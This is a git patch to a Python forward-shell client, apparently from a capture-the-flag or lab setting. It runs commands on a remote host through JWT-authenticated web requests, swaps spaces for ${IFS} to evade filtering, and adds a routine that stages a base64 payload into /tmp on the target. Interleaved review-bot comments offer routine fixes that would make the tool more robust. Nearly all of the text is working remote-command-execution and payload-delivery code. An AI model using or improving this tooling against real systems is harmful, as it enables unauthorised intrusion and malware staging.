From f5e656c74e9f2e5602fcdf63cb068e2545f0066f Mon Sep 17 00:00:00 2001 From: Isaac Parenteau Date: Fri, 4 Mar 2022 21:22:13 -0500 Subject: [PATCH] Added option to send a base64 payload --- forward_shell.py | 35 ++++++++++++++++++++++++++++------- 1 file changed, 28 insertions(+), 7 deletions(-) diff --git a/forward_shell.py b/forward_shell.py index 78a455e..4ecc503 100644 --- a/forward_shell.py +++ b/forward_shell.py @@ -12,6 +12,8 @@ import time import jwt +PAYLOAD = """Base64 Payload goes here""" + class WebShell(object): def __init__(self, remote_host='http://172.16.1.22', remote_port=3000, @@ -55,15 +57,15 @@ class WebShell(object): self.run_raw_command(clear_output) time.sleep(self.interval) - def run_raw_command(self, cmd, timeout=50, space_delimiter='${IFS}'): + def run_raw_command(self, command, timeout=50, space_delimiter='${IFS}'): """ - :param cmd: + :param command: :param timeout: :param space_delimiter: :return: """ - payload = {'cmd': cmd.replace(' ', space_delimiter)} + payload = {'cmd': command.replace(' ', space_delimiter)} token = jwt.encode(payload, self.key, algorithm='HS256') headers = {'Authorization': f'Bearer {token.decode()}'} @@ -73,15 +75,16 @@ class WebShell(object): except: pass - def write_command(self, cmd): + def write_command(self, command, timeout=50): """ - :param cmd: + :param timeout: + :param command: :return: """ - b64cmd = base64.b64encode('{}\n'.format(cmd.rstrip()).encode('utf-8')).decode('utf-8') + b64cmd = base64.b64encode('{}\n'.format(command.rstrip()).encode('utf-8')).decode('utf-8') stage_cmd = f'echo {b64cmd} | base64 -d>{self.stdin}' - self.run_raw_command(stage_cmd) + self.run_raw_command(stage_cmd, timeout) time.sleep(self.interval * 1.1) def upgrade_shell(self): 
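Review bot: `PAYLOAD` is introduced without any comment on the format it must have, although `send_payload` later in this patch calls `PAYLOAD.splitlines()` and writes each line separately. A comment above the assignment such as `# Base64 text, one chunk per line; send_payload() writes each line to a file on the remote host` would record that contract. As committed, the placeholder sentence is not base64, and nothing stops it from being written out verbatim if the constant is left unedited.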
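Review bot: The `timeout` that `write_command` now accepts cannot surface a failure, because the tail of `run_raw_command` visible in this hunk's leading context is a bare `except: pass`. A request that times out therefore looks the same to the caller as one that completed. Catching only the HTTP client's exception types and returning a success flag would make the new parameter meaningful; the `try` starts outside the hunk, so the exact exception class has to be checked there. The docstring also leaves both entries blank and lists `:param timeout:` ahead of `:param command:`; I would write `:param command: text written to self.stdin on the remote side` and `:param timeout: passed through to run_raw_command (default 50)`.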
@@ -93,6 +96,22 @@ class WebShell(object): print(upgrade_shell) self.write_command(upgrade_shell) + def send_payload(self): + """ + + :return: + """ + print('Sending payload') + payloads = PAYLOAD.splitlines() + + payload_cmd = f'cd /tmp && echo {payloads.pop(0)} > myFile.txt' + self.write_command(payload_cmd, timeout=30) + for p in payloads: + payload_cmd = f'cd /tmp && echo {p} >> myFile.txt' + self.write_command(payload_cmd, timeout=30) + + print('Done Sending Payload') + prompt = "Please Subscribe> " s = WebShell() @@ -101,5 +120,7 @@ while True: if cmd == "upgrade": prompt = "" s.upgrade_shell() + elif cmd == "payload": + s.send_payload() else: s.write_command(cmd)
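Review bot: `payloads.pop(0)` in `send_payload` raises `IndexError` when `PAYLOAD` is empty, because `''.splitlines()` returns `[]`. A guard such as `if not payloads: return` before the first write avoids the crash. The destination `myFile.txt` under `/tmp` and `timeout=30` are each repeated in both f-strings and both `write_command` calls; named module constants would keep them in step. The docstring holds only an empty `:return:`, so it should say that the first line of `PAYLOAD` overwrites that file and each later line is appended through `write_command`, since this is a side effect on the remote filesystem.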